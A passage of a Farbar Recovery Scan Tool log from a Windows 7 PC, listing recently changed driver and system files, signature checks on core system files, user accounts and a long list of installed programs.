2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\LastGood.Tmp
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2018-03-02 12:09 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:15 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2016-11-17 11:34 - 000003490 _____ C:\Windows\System32\Tasks\AutoKMS
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 11:12 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:06 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-01 17:06 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals
2018-02-17 14:54 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2018-02-17 13:46 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\AppCompat
2018-02-16 15:48 - 2013-10-17 21:57 - 008083703 _____ C:\Windows\system32\nvcoproc.bin
==================== Files in the root of some directories =======
2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ () C:\Users\Martin\AppData\Local\installer.dat
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
Some files in TEMP:
====================
2018-03-02 10:21 - 2014-02-01 00:01 - 000585520 ____N (Actual Tools) C:\Users\Martin\AppData\Local\Temp\ammemb.dll
2014-12-06 21:09 - 2014-02-01 00:01 - 001790768 ____N (Actual Tools) C:\Users\Martin\AppData\Local\Temp\ammemb64.dll
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2018-02-27 17:55
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (18-03-2018 09:05:59)
Running from D:\User profile\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-10-17 20:32:57)
Boot Mode: Safe Mode (minimal)
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1755371218-3412237994-1746218496-500 - Administrator - Disabled)
Guest (S-1-5-21-1755371218-3412237994-1746218496-501 - Limited - Disabled)
Martin (S-1-5-21-1755371218-3412237994-1746218496-1000 - Administrator - Enabled) => C:\Users\Martin
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Actual Multiple Monitors 8.1.1 (HKLM-x32\...\Actual Multiple Monitors_is1) (Version: 8.1.1 - Actual Tools)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.161 - Adobe Systems Incorporated)
Alien Isolation (HKLM-x32\...\Alien Isolation_R.G. Mechanics_is1) (Version: - R.G. Mechanics, spider91)
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\{761CB033-D425-4A16-954D-EA8DEF4D053B}) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\ArcGIS 10.2.2 for Desktop) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
Audiobook Cutter Free Edition (HKLM-x32\...\{7B460E9F-8AEC-4A46-81D5-25A3D15365F1}) (Version: 1.9.3 - Audiobook Software)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
BFME2 All-In-One Patch Installer & Switcher version 1.0 (HKLM-x32\...\{B258BEC7-DFB5-4DDC-BA90-BF02B91CA0C6}_is1) (Version: 1.0 - dijkstra & forshire)
Breach (HKLM\...\UDK-640527a6-bd3d-4ff1-8130-b9100ba72023) (Version: - Epic Games, Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
CloneCD (HKLM-x32\...\CloneCD) (Version: - SlySoft)
Commandos 2 and 3 (HKLM-x32\...\GOGPACKCOMMANDOS23_is1) (Version: 2.0.0.15 - GOG.com)
Commandos Ammo Pack (HKLM-x32\...\GOGPACKCOMMANDOS1_is1) (Version: 2.0.0.19 - GOG.com)
Company of Heroes (HKLM-x32\...\{BA801B94-C28D-46EE-B806-E1E021A3D519}) (Version: 1.0.0.78 - THQ Inc.)
Core Temp 1.0 RC6 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.0 - Alcpu)
Cossacks 3 (HKLM-x32\...\1797227701_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks 3: Guardians of the Highlands (HKLM-x32\...\1483750963_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks Anthology (HKLM-x32\...\Cossacks Anthology_is1) (Version: - GOG.com)
Cuphead (HKLM-x32\...\1963513391_is1) (Version: hotfix_1.1.4 - GOG.com)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0337 - Disc Soft Ltd)
Dark Reign + Expansion (HKLM-x32\...\GOGPACKDARKREIGN_is1) (Version: 2.0.0.41 - GOG.com)
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Diaspora version 1.1.1 (HKLM-x32\...\{1F5ABAAA-6D61-4FC1-A595-86CBA5517E7A}_is1) (Version: 1.1.1 - Diaspora Development)
Discord (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Discord) (Version: 0.0.300 - Discord Inc.)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 391.01 - NVIDIA Corporation) Hidden
DisplayFusion 5.1.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 5.1.1.0 - Binary Fortress Software)
Distrust (HKLM-x32\...\Distrust_is1) (Version: - )
Divinity - Original Sin Enhanced Edition (HKLM-x32\...\1445516929_is1) (Version: 2.5.0.12 - GOG.com)
Divinity Original Sin 2 (HKLM-x32\...\Divinity Original Sin 2_is1) (Version: - )
Dolphin VR 4.0 (HKLM-x32\...\Dolphin) (Version: 4.0 - Dolphin Team)
Doom (HKLM-x32\...\{B6A2B3BA-C93E-4AEE-BBCF-BE91DDC84962}_is1) (Version: - id Software)
EasyLog USB (HKLM-x32\...\{4F84DDD2-7468-4771-9906-3552521CE796}) (Version: 6.8.0 - Lascar Electronics Ltd.)
Elite Dangerous Launcher version 0.4.5499.0 (HKLM-x32\...\{696F8871-C91D-4CB1-825D-36BE18065575}_is1) (Version: 0.4.5499.0 - Frontier Developments)
Enter the Gungeon (HKLM-x32\...\1456912569_is1) (Version: 2.7.0.9 - GOG.com)
EVEMon (HKLM-x32\...\EVEMon) (Version: 2.2.3 - battleclinic.com)
EVERSPACE (HKLM-x32\...\1513949567_is1) (Version: 2.0.0.2 - GOG.com)
Exact Audio Copy 1.3 (HKLM-x32\...\Exact Audio Copy) (Version: 1.3 - Andre Wiethoff)
f.lux (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Flux) (Version: - f.lux Software LLC)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version: - Ubisoft)
Game of Thrones Episode 6 (HKLM-x32\...\Game of Thrones Episode 6_is1) (Version: - )
GameRanger (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\GameRanger) (Version: - GameRanger Technologies)
Gauntlet Slayer Edition (HKLM-x32\...\Gauntlet Slayer Edition_is1) (Version: - )
GOG.com Commandos 2 (HKLM\...\{c1a036f7-30df-46e5-b5a3-c5e67039e947}.sdb) (Version: - )
GOG.com Heroes of Might and Magic 3 (HKLM\...\{1d3c859c-1028-4822-b0a7-da4f7bbc18bc}.sdb) (Version: - )
GOG.com The Settlers 3 (HKLM\...\{f707a2f1-2ed1-4560-a087-97aa176c3777}.sdb) (Version: - )
GOG.com Unreal Tournament GOTY (HKLM\...\{fa491d91-322c-4059-a1f7-4a79782edee8}.sdb) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 64.0.3282.186 - Google Inc.)
Google Earth Pro (HKLM-x32\...\{FA1BBF34-E994-4310-95D7-BE93092B8E61}) (Version: 7.3.1.4507 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Hammerwatch (HKLM-x32\...\GOGPACKHAMMERWATCH_is1) (Version: 2.3.0.6 - GOG.com)
Hand of Fate - Wildcards (HKLM-x32\...\Hand of Fate: Wildcards_is1) (Version: 2.3.0.7 - GOG.com)
Hand of Fate (HKLM-x32\...\1424100574_is1) (Version: 2.4.0.8 - GOG.com)
Hand of Fate 2 (HKLM\...\aGFuZG9mZmF0ZTI_is1) (Version: 1 - )
Handset USB Driver (HKLM\...\{D2D77DC2-8299-11D1-8949-444553540000}_is1) (Version: 5.2066.1.A14B04 - )
HCS Voice Pack version 1.6.2 (HKLM-x32\...\{CEAF7641-D8E3-41C2-9D26-13D1DE9E6EF7}_is1) (Version: 1.6.2 - HCS Voice Packs)
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
HELLDIVERS (HKLM-x32\...\HELLDIVERS_is1) (Version: - )
Heroes & Generals (HKLM-x32\...\Heroes & Generals) (Version: 1.0.6.1 - Reto-Moto)
Heroes of Might and Magic 3 Complete (HKLM-x32\...\GOGPACKHOMM3COMPLETE_is1) (Version: 2.0.0.16 - GOG.com)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.1.4.6 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
Homeworld Deserts of Kharak (HKLM-x32\...\Homeworld Deserts of Kharak_is1) (Version: - )
Homeworld Remastered Collection (HKLM-x32\...\SG9tZXdvcmxkUmVtYXN0ZXJlZENvbGxlY3Rpb24=_is1) (Version: 1 - )
How to Survive (HKLM-x32\...\How to Survive_is1) (Version: - )
How to Survive El Diablo Islands (HKLM-x32\...\How to Survive El Diablo Islands_is1) (Version: - )
HP Dropbox Plugin (HKLM-x32\...\{23617173-F935-4C17-A323-EB1207F3ED49}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
HP ENVY 4520 series Basic Device Software (HKLM\...\{AA543771-C534-4954-831A-9862C626796F}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP Google Drive Plugin (HKLM-x32\...\{AFF80405-E56A-48E7-98FC-8E46E261949F}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
Hunted - The Demon's Forge (HKLM-x32\...\Hunted - The Demon's Forge_R.G. Mechanics_is1) (Version: - R.G. Mechanics, spider91)
iDealshare VideoGo 6.1.1.6250 (HKLM-x32\...\{CC4C06C4-7C78-4AAB-B5AF-33FB11CCD850}_is1) (Version: - iDealshare Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Java 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle)
K-Lite Mega Codec Pack 12.9.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.9.0 - KLCP)
Kutools for Excel 11.0.0.228 (HKLM-x32\...\{A095BA43-4A97-4D55-8E25-A0BC46F10765}_is1) (Version: 11.0.0.0 - Detong)
L.A.Noire (HKLM-x32\...\L.A.Noire_R.G. Mechanics_is1) (Version: - R.G. Mechanics, spider91)
LaCie Private Public version 1.2 (HKLM\...\{5553AC21-44FC-4F8B-B3BB-3B7E913F465B}_is1) (Version: 1.2 - LaCie Private, Inc.)
Legend of Grimrock 2 (HKLM-x32\...\Legend of Grimrock 2_is1) (Version: - )
Lightning (HKLM-x32\...\{277C2E30-99C8-40A5-B5F6-A21422ACDB6A}) (Version: - )
Little Big Adventure (HKLM-x32\...\GOGPACKLBA_is1) (Version: 2.0.0.20 - GOG.com)
Little Big Adventure 2 (HKLM-x32\...\GOGPACKLBA2_is1) (Version: 2.0.0.6 - GOG.com)
Little Nightmares (HKLM-x32\...\Little Nightmares_is1) (Version: - )
Little Nightmares Secrets of The Maw Chapter 1 (HKLM-x32\...\Little Nightmares Secrets of The Maw Chapter 1_is1) (Version: - )
LogMeIn Hamachi (HKLM-x32\...\{99A016E1-0840-43AE-8434-A18CEDFA833B}) (Version: 2.2.0.58 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.58 - LogMeIn, Inc.)
LOTR The Return of the King tm (HKLM-x32\...\{6E298B0A-558C-4138-0096-740677B382CD}) (Version: - )
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Master of Magic (HKLM-x32\...\GOGPACKMASTEROFMAGIC_is1) (Version: 2.0.0.20 - GOG.com)
Metal SLUG X 1.0 (HKLM-x32\...\Metal SLUG X 1.0) (Version: 1.0 - Èãðû íà Cat-A-Cat.NET)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - English (HKLM\...\{20150000-001F-0409-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - Swedish (HKLM\...\{20150000-001F-041D-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
